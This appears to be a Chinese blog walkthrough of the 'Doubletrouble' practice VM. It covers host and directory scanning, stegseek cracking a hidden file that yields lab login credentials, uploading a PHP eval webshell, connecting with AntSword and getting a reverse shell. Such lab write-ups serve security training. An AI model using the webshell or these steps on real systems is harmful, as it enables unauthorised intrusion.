当前位置: 首页 > news >正文

Doubletrouble靶机练习

news 2025/8/11 16:36:10

vb打开虚拟机,网络设置为桥接

主机扫描

nmap 192.168.43.1/24

80端口

扫描目录

dirsearch -u http://192.168.43.124

发现文件上传目录

secret目录,有一张图片

下载下来,看看有没有隐写

wget http://192.168.43.124/secret/doubletrouble.jpg

steghide --info doubletrouble.jpg

发现有密码,应该有东西,破解一下试试

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

查看output文件

otisrush@localhost.com
otis666

是邮箱密码,登录

在修改个人信息的地方有文件上传按钮,我们可以尝试上传,看看能不能上传到我们之前找到的文件上传目录

上传木马,发现报错

<?php @eval($_POST[cmd]);?>

但我们确实是上传成功了,连接一下

蚁剑连接成功

反弹shell,开启监听

利用网站生成一个木马  Online - Reverse Shell Generator

重新上传

开启监听后,访问一下1.php文件,就可以反弹shell了

http://www.xdnf.cn/news/1277461.html

相关文章:

  • Leaflet地图高亮与编辑功能实现
  • Jmeter性能测试之检测服务器CPU/Memory/磁盘IO/网络IO
  • 深度学习-卷积神经网络-AlexNet
  • 【走进Docker的世界】Docker环境搭建
  • 震动马达实现库函数版(STC8)
  • 机器学习——多元线性回归
  • C++移动语义、完美转发及编译器优化零拷贝
  • [创业之路-541]:经营分析会 - 企业的经营分析会,研发负责人负责提供哪些信息?
  • 【RocketMQ 生产者和消费者】- ConsumeMessageOrderlyService 顺序消费消息
  • 不同于传统的简并模分离圆极化天线,基于耦合谐振器的圆极化天线的原理是什么?
  • 如何通过API接口实现批量获取淘宝商品数据?(官方与非官方渠道分享)
  • 代码随想录算法训练营第六十天|图论part10
  • Java 基础编程案例:从输入交互到逻辑处理
  • ATF(TF-A)安全通告 TFV-12(CVE-2024-5660)
  • JDBC的连接过程(超详细)
  • 机器学习——标准化、归一化
  • 从零开始理解百度语音识别API的Python实现
  • nginx 反向代理传递原始域名
  • 前端开发中的常见问题与实战解决方案​
  • PostgreSQL 批量COPY导入优化参数配置
  • GC如何判断对象可以被回收?
  • SpringAI报错:com.github.victools.jsonschema.generator.AnnotationHelper
  • 《设计模式》UML类图
  • Java集合框架、Collection体系的单列集合
  • Elasticsearch QueryDSL 教程
  • Android APK 使用OpenGl 绘制三角形源码
  • Spring Boot 全局异常处理与日志监控实战
  • 智能体革命:网络安全人的角色重塑与突围指南
  • 井字游戏的强化学习
  • 复现论文《基于Retinex理论和深度学习的低照度图像增强算法研究》